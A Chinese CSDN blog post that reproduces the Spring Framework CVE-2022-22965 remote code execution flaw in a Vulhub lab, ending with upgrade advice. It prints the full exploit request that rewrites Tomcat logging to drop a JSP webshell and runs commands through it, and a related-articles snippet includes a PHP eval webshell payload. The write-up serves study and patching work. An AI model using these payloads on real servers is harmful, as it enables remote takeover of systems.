CVE-2022-22965:Spring远程代码执行漏洞复现

最新推荐文章于 2025-03-17 17:42:36 发布
最新推荐文章于 2025-03-17 17:42:36 发布
阅读量3.3k 收藏 34
点赞数 11
文章标签: spring java 后端 web安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/136742911
版权

一.Spring Framework框架的概念

Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。

二.漏洞原理

由于Spring框架历史漏洞修复代码存在缺陷,在 JDK 9 及以上版本环境下,远程攻击者可借助Tomcat中间件构造数据包修改日志文件,从而可在任意路径下写入Webshell等恶意文件,最终可导致执行任意代码控制服务器等危害。

三.影响版本

Spring Framework 5.3.X < 5.3.18
Spring Framework 5.2.X < 5.2.20

目前已知触发该漏洞需要满足以下条件:
1.使用 JDK9 及以上版本
2.Apache Tomcat 作为 Servlet 容器
3.打包为 WAR
4.使用 spring-webmvc 或 spring-webflux 的依赖

四.搭建环境

1.vulhub靶场下载

Vulhub - Docker-Compose file for vulnerability environment

docker-compose_免费高速下载|百度网盘-分享无限制 (baidu.com)

2.docker-compose下载地址

Releases · docker/compose · GitHub

docker-compose_免费高速下载|百度网盘-分享无限制 (baidu.com)

3.服务启动

一切都准备好之后就可以启动CVE-2022-22965 的环境了.

先cd到spring目录下的CVE-2022-22965里面,然后使用docker-compose启动环境.

docker-compose up -d                 #安装并启动环境

docker ps                         #查看当前正在运行的服务

可以看到spring的端口为8080

ip a         #查看IP      我的IP为192.168.128.141

在浏览器端输入 你的ip+端口8080 访问服务,如果显示页面正常显示内容 ,则表示服务搭建成功!

五.漏洞复现

1.验证

在URL后添加参数: /?name=Baby&age=3

http://192.168.128.141:8080/?name=Baby&age=3

2.注意事项

当你的靶场环境和BP在同一环境下时, 会占用端口, 从而无法抓包. 将端口进行修改即可.

3.写入文件

发送以下请求以更改 Apache Tomcat 中的日志记录配置并将日志写入 JSP 文件:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22p%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

Host: 192.168.128.141:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: JSESSIONID=34586F002A5F125E0C3F9BBAC4C43F4D

Upgrade-Insecure-Requests: 1

BP抓包, 将第一行的URL替换为以下代码即可:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22p%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

4.命令执行

访问传入的 JSP webshell , 并执行任意命令:

http://192.168.128.141:8080/tomcatwar.jsp?pwd=j&cmd=id     #这里注意写你自己的IP

六.修复建议

由于漏洞可能存在其他利用方式,可能会扩大影响程度,优先建议升级 Spring Framework 到安全版本

安全版本

Spring Framework = 5.3.18
Spring Framework = 5.2.20
及基于Spring Framework 5.3.18 的 Spring Boot 2.6.6 、Spring Boot 2.5.12

修复参考链接: 【安全通告】Spring Framework 远程代码执行漏洞风险通告(CVE-2022-22965)

文章参考:CVE-2022-22965:Spring远程代码执行漏洞-CSDN博客

CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3848
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
CVE-2022-22965:Spring远程代码执行漏洞复现
xjh8023的博客
11-09 562
CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
Spring Framework RCE CVE-2022-22965漏洞学习
weixin_68320784的博客
04-09 2013
一、概述 3月底Spring Framework爆出严重级别的安全漏洞,该漏洞允许黑客进行任意命令执行。在3月31日Spring Framework官方发布了5.3.18以及5.2.20修复了该漏洞,随后该漏洞编号为CVE-2022-22965,这个漏洞也是先发布修复版本,后分配CVE编号的。从官网可知该漏洞存在的条件: 使用JDK9及以上版本 使用Apache Tomcat作为容器 使用了传统的WAR包部署方式 依赖了spring-wemvc以及springwebflux Spring Fra
Spring官宣网传大漏洞,并提供解决方案(1)
2401_83916204的博客
04-17 926
引领完成Docker的安装、部署、管理和扩展,让其经历从测试到生产的整个开发生命周期,深入了解Docker适用于什么场景。并且这本Docker的学习权威指南介绍了其组件的基础知识,然后用Docker构建容器和服务来完成各种任务:利用Docker为新项目建立测试环境,演示如何使用持续集成的工作流集成Docker,如何构建应用程序服务和平台,如何使用Docker的API,如何扩展Docker。
CVE与重要漏洞复现SpringFrameWorkRCE(CVE-2022-22965)漏洞
最新发布
没有网络安全就没有国家安全
03-17 602
CVE与重要漏洞复现SpringFrameWorkRCE(CVE-2022-22965)漏洞
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 4057
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
CVE-2022-22965 漏洞复现
Ethan_cfq的博客
04-13 470
执行格式 :python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro。此时已将tomcat的日志存储位置已修改为:tomcatwar.jsp,此文件是小马文件,可执行远程命令。拉取cve-2022-22965环境(vulhub拉去环境并打开漏洞环境)在靶场环境搭建可访问的情况下,运行python文件,可直接进行远程命令执行。此时我们可以正常访问页面,说明我们的靶场环境可以使用。访问靶场环境是否可正常访问。此时,手工漏洞复现结束。
spring framework漏洞复现
m0_56135391的博客
04-12 1866
1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证,此处使用kali进行攻击,命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc(python文件) #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%
CVE-2022-22965漏洞复现
Foreverlove112的博客
10-01 563
CVE-2022-22965漏洞复现
CVE-2022-22965复现
lionwerson的博客
06-10 437
简介:在jdk 9+上运行的Spring MVC或Spring WebFlux application可能会导致RCE复现环境: 服务启动后,访问 即可看到一个演示页面。poc:使用方法:-t 输入目标地址,-c输入执行命令,默认为id
CVE-2022-22965Spring远程代码执行漏洞
hjseo_seg的博客
07-30 823
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。Springframework是Spring里面的一个基础开源框架,其目的是用于简化Java企业级应用的开发难度和开发周期,2022年3月31日,VMwareTanzu发布漏洞报告,SpringFramework存在远程代码执行漏洞,在JDK9+上运行的SpringMVC或SpringWebFlux应用程序可能容易受到通过数据绑定的远程代码执行(RCE)的攻击。...
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5947
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞复现
Wiofgb的博客
08-12 1994
记录一次CVE-2022-22965 Spring Framework远程代码执行漏洞复现
CVE-2022-22965 Spring Framework远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-14 3258
springframework 是spring 里面的一个基础开源框架,主要用于javaee的企业开发。Spring是什么呢?首先它是一个开源的项目,而且非常活跃;它是一个基于IOC和AOP的构架多层j2ee系统的框架,但它不强迫你必须在每一层中必须使用Spring,因为它模块化的很好,允许你根据自己的需要选择使用它的某一个模块;
CVE-2022-22965Spring Framework)复现
kriesa的博客
07-13 1055
CVE-2022-22965Spring Framework)复现
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4087
CVE-2022-22965 Spring远程代码执行漏洞复现
漏洞复现CVE-2022-22965 Spring Framework远程代码执行漏洞
m0_53121608的博客
07-16 283
服务启动后,访问http://your-ip:8080/?name=Steve&age=25即可看到一个演示页面。
CVE-2022-22965分析复现
include_voidmain的博客
04-12 3715
0x01 前置知识 Introspector类 javabean通常是用来做数据封装的java类,为了方便数据的读取与写入,会有getter/setter方法来对数据进行操作,在jdk中有一个Introspector类,通过该类的方法可以获取javabean的相关信息,包括javabean中的属性值,以及属性值对应的getter/setter方法。 对于属性的获取,其实是通过对应的getter/setter方法来确定的,如果存在对应的getter/setter方法或其中的一个,都会认为存在对应的属性,下面通
php cve漏洞复现
01-01
### PHP CVE 漏洞详情与复现教程 #### CVE-2019-11043 远程代码执行漏洞漏洞存在于特定版本的PHP中,在处理某些类型的输入时可能导致远程代码执行。为了重现这个漏洞,可以使用VulnHub提供的环境设置工具[^1]。 ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d ``` 通过上述命令启动含有该漏洞的服务端口后,可以根据具体的测试指南进一步操作来验证是否存在安全风险。 #### CVE-2016-7124 反序列化漏洞 对于CVE-2016-7124而言,这是一个影响多个PHP版本的安全问题,主要由于`var_unserializer.c`文件未能妥善处理无效对象而导致可能被用来实施拒绝服务攻击或更严重的后果[^2]。针对这一情况的一个简单的POC如下所示: ```php <?php // 测试页面 test3.php 的内容应包含类似下面这样的代码片段用于接收恶意构造的数据包并尝试反序列化它。 class Test { public $name; } unserialize($_GET['s']); ?> ``` 访问URL `http://127.0.0.1/test3.php?s=O:4:"test":2:{s:4:"name";s:29:"< ? php @ eval ($_ POST ['123']);? >;"}` 将触发潜在的风险行为[^4]。 请注意以上仅作为学习用途的技术探讨,请勿非法入侵任何系统!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值